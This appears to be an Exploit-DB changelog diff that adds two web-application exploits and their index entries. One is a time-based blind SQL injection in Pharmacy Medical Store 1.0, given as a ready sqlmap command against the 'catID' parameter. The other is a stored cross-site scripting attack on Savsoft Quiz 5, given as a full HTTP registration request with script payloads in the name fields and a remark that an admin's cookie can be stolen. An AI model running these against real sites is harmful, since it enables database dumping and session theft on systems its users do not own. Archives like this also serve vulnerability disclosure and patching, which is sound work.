DB: 2020-08-19

2 changes to exploits/shellcodes

Pharmacy Medical Store and Sale Point 1.0  - 'catid' SQL Injection
Savsoft Quiz 5 - Stored Cross-Site Scripting

exploits/php/webapps/48752.txt

@@ -0,0 +1,13 @@
+# Title: Pharmacy Medical Store and Sale Point 1.0  - 'catid' SQL Injection
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-08-18
+# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+
+# Description
+This parameter "catId" is vulnerable to Time-Based blind SQL injection in this path "/medical/inventeries.php?catID=1" that leads to retrieve all databases.
+
+#POC
+sqlmap -u "http://TARGET/medical/inventeries.php?catID=1" -p catId --dbms=mysql --threads=10

exploits/php/webapps/48753.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Savsoft Quiz 5 - Stored Cross-Site Scripting
+# Date: 2020-07-28
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage:  https://savsoftquiz.com/
+# Software Link:  https://github.com/savsofts/savsoftquiz_v5.git
+# Version: 5.0
+# Tested on: Windows 10
+# Contact: https://www.linkedin.com/in/th3cyb3rc0p/
+
+Stored Cross-site scripting(XSS):
+Stored attacks are those where the injected script is permanently stored on the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel,
+the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: First Name, Last Name
+Steps for reproduce:
+1. Goto registration page
+2. fill the details. & put <script>alert("XSS")</script> payload in First name,Last name
+3. Now goto Admin Panel.we can see that our payload gets executed.
+
+POST /index.php/login/insert_user/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 255
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/index.php/login/registration/
+Cookie: ci_session=d99b121b1213b92a163181fd49c75f667dbce9ea
+Upgrade-Insecure-Requests: 1
+
+email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1

files_exploits.csv

@@ -42993,3 +42993,5 @@ id,file,description,date,author,type,platform,port
 48749,exploits/hardware/webapps/48749.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion",2020-08-17,LiquidWorm,webapps,hardware,
 48750,exploits/hardware/webapps/48750.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure",2020-08-17,LiquidWorm,webapps,hardware,
 48751,exploits/hardware/webapps/48751.txt,"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)",2020-08-17,LiquidWorm,webapps,hardware,
+48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0  - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php,
+48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,